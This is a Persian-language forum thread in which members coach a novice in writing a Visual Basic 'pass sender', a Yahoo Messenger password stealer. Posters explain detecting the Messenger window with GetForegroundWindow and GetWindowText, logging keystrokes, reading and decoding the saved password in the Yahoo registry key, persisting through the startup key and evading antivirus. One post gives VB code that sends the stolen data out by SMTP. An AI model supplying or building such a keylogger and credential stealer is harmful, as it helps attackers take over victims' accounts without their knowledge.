چگونه مي شود با وي بي يه پس سندر ساخت؟
Printable View
چگونه مي شود با وي بي يه پس سندر ساخت؟
منظورت از پس سندر چيه ؟ ميخواي يه برنامه مثل Magic PS بنويسي ؟
آره ديگه.
كار سختي نيست يكي از بچه ها نوشته بود. بايد چك كني ببيني پنجره كه فوكوس روشه ياهو هست يا نه.اگه ياهو بود هر كليدي كه فشرده شد رو ثبت كني و بفرستي.
چه ميشه با وي بي يه پس سندر يا برنامه هك ساخت
اگه كسي مسدونه چه جوري ميشه پس يندر ساخت يا برنا مه هك بگه ازش يه دنيا تشكر مي كنم.
چون خيلي به اين نياز دارم.
اقا تو قبليا دوتا كلمه رو اشتباه نوشتم شرمنده.منظورم از چه اولي چه جوريه و منظورم از ميسدونه ميدونس به بزرگي خودتون ببخشيد.
اقا پيمان قربون دستت يه كم بيشتر توضيح مي دي دمت گرم
چجوري مي تونم يه كاري كنم كه فوكوس رويه ياهورو كنترل كنه ؟
بايد يه تايمر بذاري هندل هر پنجره اي كه فوكوس روشه رو بهت بده. بعد گرفتن هندل caption پنجره رو بايد چك كني ببيني با caption ياهو مسنجر يكي هست يا نه. اگه بود هر كليدي كه فشرده شد ثبت كن و بفرست.
بقيه امكانات هم با رجيستري حله
من مي فهمم شما چي ميگين اما بلد نيستم اگه ميشه بگو چه جوري ميشه يه برنامرو كنترل كرد(اگه ميتوني يه سورس مثال بهم بده) دستت درد نكنه
GetForegroundWindow هندل پنجره داراي فوكوس رو بهت ميده.
از GetWindowTextLength و GetWindowText هم ميتوني براي به دست آوردن caption اون پنجره كمك بگيري.
البته راهي كه آق پيمان ميگن راه خوبيه ولي قطعا magic ps از اين روش استفاده نميكنه . يه چيزه ديگه هم هست . گرفتن caption يه پنجره هميشه راه خوبي نيست . چون ممكنه يه فولدر به همون اسم باز باشه . اون وقت برنامه اونو با ياهو مسنجر اشتباه ميگيره
پس اقا مصتفي بايد چيكار كنم كمكم مي كنين
مجيك پس از اطلاعات سيو شده در رجيستري استفاده ميكنه و اونارو decode ميكنه و ميفرسته.نقل قول:
نوشته شده توسط Mostafa1024
گرفتن caption هم بدك نيست. اگر هم فولدري باشه مشكلي پيش نمياد. چون طرف چيزي تايپ نميكنه كه فرستاده بشه. حالا اگرم پنجره اي اشتباه گرفته بشه و اطلاعاتي به اشتباه فرستاده بشه ميشه فهميد كه اين اطلاعات آيدي پسورد نيست و اطلاعات اشتباه است.
اقا پيمان راهي وجود نداره كه پنجره رو اشتباه نگيره چون ممكنه طرف تو اون پنجره كه اشتباه گرفته چيزاي زيادي تايپ كنه و بعد مشكل ايجاد شده
راستي اگه اين كارو كنم رو همه ورژنهايه ياهو جواب مي ده
احتمالش كمه اشتباه بگيره. چون كمتر پنجره اي داراي caption مثل ياهو هست. ولي ميتوني از كلك رشتي استفاده كني.
مثلا چك كني ببيني ياهو تو پروسس ليست هست يا نه البته روش خوبي نيست. چون اكثرل ياهو تو استارت آپه و با بالا اومدن وين اجرا ميشه.
ولي حتي اگه اطلاعات زياديم بياد كه بعيده مهم نيست. شما خيلي راحت پاكشون ميكني.
برا جواب دادن رو همه ورژن ها بايد caption ورژن هاي مختلف رو چك كني. مثلا 6 و 7 با هم فرق دارن. ولي كار ساده ايه.
اقا پيمان من تصميم گرفتم از اول مرحله به مرحله به كمك شما پيش برم ما براي اينكه پس سندر بسازيم بايد ايدي رو بدست بياريم اونم از ريجستري الان من اگه بخوام مقدار وال اينو HKEY_CURRENT_USER\Software\Yahoo\Pager\Yahoo! User ID بدستبيارم بايد چه كدي بنويسم ؟
براي خواندن value ميتوني با RegOpenKeyExA كليد مربوطه رو باز كني و با RegEnumValueA دنبال value مورد نظر بگردي تا مقدارشو پيدا كني. البته احتمالا راه ساده تري هم هست. ولي احتياج به خواندن ID از رجيستري نيست. چون keylogger آيدي رو هم همراه پسورد ميفرسته. شما وقتي پنجره مسنجر رو پيدا كني هر كليدي فشرده شه ميفرستي كه آيدي هم جزشه.
ولي يه مشكلي كه هست اينه كه شايد طرف save password زده باشه. در اين صورت چيزي تايپ نميكنه و براي ما هم چيزي ميل نميشه. در اين صورت شما 2 كار ميتوني بكني. يا به آدرس HKEY_CURRENT_USER\Software\yahoo\Pager بري و مقدار اين EOptions string كه يه value هست رو بخوني و مقدارش رو decode كني تا پسورد رو به دست بياري. كاري كه مجيك ميكنه. آيدي رو هم كه خودت ميدوني از كجا به دست بياري.
ولي decode كردن پسورد يه مقدار مشكله. پس بهتره از كلك رشتي استفاده كني. حالا من نميگم چه كار ميشه كرد. خودت بگو ببينم براي فرار از اين بن بست چي به ذهنت ميرسه.
اول بگم كلك رشتي اينه كه يه كاري مي كني طرف پسش نتونه سيو كنه دومن واسه ريجستري يه مثال بزن واسه پيدا كردن پنجره ام يه مثال بزن(يني كدشو برام بنويس)
عيدتم مبارك
اقا پيمان من يه وي بي تازه كارم(البته نه خيلي يه بازي با وي بي ساختم) كار بار ريجيستري و گرفتن پنجره يه برنامه رو با يه مثال برام توضيح بده.دمت گرم.
منم مثل خودتم عزيز.
كلك رشتي رو درست گفتي ولي نگفتي چه طور اين كارو بايد كرد.
الانم حدود يه ربع مونده به عيد. فكر نكنم هيچ كي اين موقع آن شه. من برم كارامو بكنم بعدا در خدمتم.
كار با ري جستري رو چي ياد مي دي دمت گرم.
سال نو شما پيمان جان مبارک
سالی پر از موفقیت و شادکامی را يرايت آرزومندم . موفق و پیروز و سربلند باشی.
ببين در مورد كار با رجيستري و گرفتن هندل پنجره داراي فوكوس كه صحبت كرده بوديم. گفتم كه از چه Api هايي ميتوني استفاده كني. ديگه چيزي نمونده بگم.
عيد شمام مبارك. عيد بر تمام ايرانيان ايران زمين مبارك باد.
يزره بيشتر توضيح نداده بودي يه مثال بزن ياد بگيرم.
چرا از Msdn كمك نميگيري. توضيح اين توابع خيلي وقت گيره.
اخه msdn ندارم
با سلام
البته اقايون اساتيد همه دزست عرض كردند ولي تو همه يك مشكلي بود
استفاده از رجيستري اشتباه چون من خودم همين برنامه را با كار با رجيستري نوشتم ولي هر انتي ويروسي نصب باشه گير ميده
واسه همين همونو بدون كار با رجيستري نوشتم كه عالي هم كار ميكنه حالا اگه تونستم اپلودش ميكنم
ما كه با رجيستري كاري نداريم. چيزي توش ثبت نميكنيم. فقط ازش اطلاعات ميخونيم. آنتي كه به خوندن اطلاعات مشكلي نداره.
حالا شما ازمايش كن من كه حرفي نزدم وقتي ميشه بدون رجيستري راحت نوشت چرا كار خودمونو سخت كنيم
راستي يه سايت خوب واسه اپلود سراغ داري بگو ممنون فقط سايتش درد سر دار نباشه مرسي
سايت خوب وايه up مي خاي برو اينجا [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
شما يه مقاله توپ براي يادگيري ريجستري سراق نداري
مساله اينه كه ما مجبوريم با رجيستري در ارتباط باشيم اگه طرف سيو پسورد زده باشه مجبوريم به كمك رجيستري سيو پسورد رو برداريم. من قبلا برنامه نوشتم كه با رجيستري در ارتباط بوده ولي آنتي با برنامم كنار ميومد.
سايت براي آپلود
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] upload ax
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] upload
پيمان جان شما كه ريجستري ياد ندادي خودم يه مقاله دربارش پيدا كردم لا اقل راهنماييم كن
لينك مقاله رو ميزارم اگه خاستي بگير [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
من ازت يه سوال داشتم اونم اينه كه يسري كد تو اين مقاله هست بايد تو ما ژول بنويسم اره؟
حالا يا ماژول يا تو فرمت. اگه بخواي تو همه فرمات ازش استفاده كني بذار تو ماژول ولي اگه يه فقط يه فرم داري ميتوني بذاري تو همون يه فرم.
مقاله خيلي خوبيه بخوني كارت را ميفته.
رو RegOpenKeyExA كليد رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني.
خوب حالا فرض پسورد رو گرفتي با رجيستري يا بي رجيستري(نظر من بي رجيستريه) چطور ميخواي از تو كامپيوتر طرف واسه خودت سند كني
به كمك Smtp
ببين اقا پيمان اينجوري من هيچي نميفهمم بزا مرحله به مرحلهنقل قول:
نوشته شده توسط Payman_62
اول ازت مي پرسم بايد كدوم كدارو حتما تو فرم بنويسم تا كار را بيفته و بتونم با ريجستري توسط فرمانهايي كه گفته كار كنم؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟
ببين داداش من كار با ريجستري و ماژولو درست حسابي ياد بگيرم بقيش حلهنقل قول:
نوشته شده توسط sherwood
تازه يسري كد دارم فكر كنم واسه ميل زدنه ميزارم ببين درسته
Dim Counter As Integer
Private Sub Command1_Click()
If txtFrom.Text <> "" And txtRcpt.Text <> "" And txtSubject.Text <> "" And txtBody.Text <> "" Then
wskEmail.Connect "mail.hotmail.com", 25
Timer1.Enabled = True
End If
End Sub
Private Sub Command2_Click()
Timer1.Enabled = False
wskEmail.Close
End Sub
Private Sub Form_Load()
Dim MyIP As String
MyIP = wskEmail.LocalHostName & "'s " & "IP address is " & wskEmail.LocalIP
Label1.Caption = MyIP
End Sub
Private Sub menuExit_Click()
wskEmail.Close
End
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
Counter = Counter + 1
If Counter = 1 Then
wskEmail.SendData "helo" & vbCrLf
ElseIf Counter = 2 Then
wskEmail.SendData "mail from: " & txtFrom.Text & vbCrLf
ElseIf Counter = 3 Then
wskEmail.SendData "rcpt to: " & txtRcpt.Text & vbCrLf
ElseIf Counter = 4 Then
wskEmail.SendData "data" & vbCrLf
ElseIf Counter = 5 Then
wskEmail.SendData "subject: " & txtSubject.Text & vbCrLf
ElseIf Counter = 6 Then
wskEmail.SendData vbCrLf
ElseIf Counter = 7 Then
wskEmail.SendData txtBody.Text & vbCrLf
ElseIf Counter = 8 Then
wskEmail.SendData "." & vbCrLf
ElseIf Counter = 9 Then
wskEmail.SendData "quit" & vbCrLf
Timer1.Enabled = False
End If
End Sub
Private Sub wskEmail_DataArrival(ByVal bytesTotal As Long)
Dim Incomming As String
wskEmail.GetData Incomming
Text1.Text = Incomming & vbCrLf & Text1.Text
End Sub
گفتم كه با RegOpenKeyExA كليدي كه Value مورد نظر توش هست رو باز كن و با RegEnumValueA ميتوني Value مورد نظرت رو سرچ كني. اون كليد كه بايد باز شه HKEY_CURRENT_USER\Software\yahoo\Pager هست و value كه بايد تو اين كليد باز شده سرچ شه ميتونه مثلا Yahoo! User ID باشه. بايد ببيني با توجه به كلك رشتي كه ميخواي بزني رو كدوم value ها بايد كار كني. حالا ببين تو اون فايل pdf كدوم ثابت ها و تعاريف مربوط به اين دو تا API ميشن و اونارو كپي كن.
حالا فعلا با همين 2 API رجيستري كار داريم. ولي در ادامه كار ممكنه API هاي ديگر هم نياز شن. مثل RegCreateKeyExA براي قرار دادن برنامت در استارت آپ كه اونم تو فايل pdf كه گذاشتي توضيح داده شده.
راستي نگفتي چه جوري ميخواي سيو پسورد رو بر ميداري.